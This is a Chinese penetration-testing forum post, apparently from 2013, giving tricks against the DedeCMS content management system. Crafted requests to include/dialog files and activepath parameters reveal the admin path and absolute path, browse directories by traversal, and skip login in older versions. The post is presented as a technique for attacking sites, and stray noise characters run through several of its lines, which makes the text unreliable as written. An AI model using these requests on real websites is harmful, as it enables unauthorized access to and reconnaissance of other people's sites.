找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
返回列表 发新帖
查看: 3149|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理$ }, @- f, L$ K# R/ N

9 d; \. t8 @% ~1 }: s员帐号,新版本的就直接转向了后台.
6 C+ V8 _9 p1 v2 x
9 F3 a8 e5 j# K6 M- y6 {$ I; L2.include/dialog/config.php会爆出后台管理路径$ f  X) G; n* B( N+ i8 V$ j

# i# P# F* U7 @) z' E. H. o3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录2 l3 B& d1 i! F2 J* f1 }
- d; D' {3 L- J5 A
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.( h2 t2 e& }& v" s  r3 t6 s  s
) ]5 @0 t0 G4 I& _
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
" y2 Z: T0 G6 R7 K8 M
# `, H3 b  B% y" Z到根目录去.不过这些版本的访问地址有些不同.
- l, p. B! d$ C( I. V+ f地址为require/dialog/select_soft.php?activepath=/././././././././
/ }2 [% x3 T) M. Y& d
. y+ R) e# U3 Q+ |include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..  L+ J1 ~( G  V- b
存在相同问题的文件还有) g8 s5 B& d- w; C5 l
include\dialog\select_images.php" y5 f* {* b$ B% j; M; C+ g) L
include\dialog\select_media.php
' ]! `5 Z+ V' `' B# O1 Winclude\dialog\select_templets.php​& t9 _  ^- q% M
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表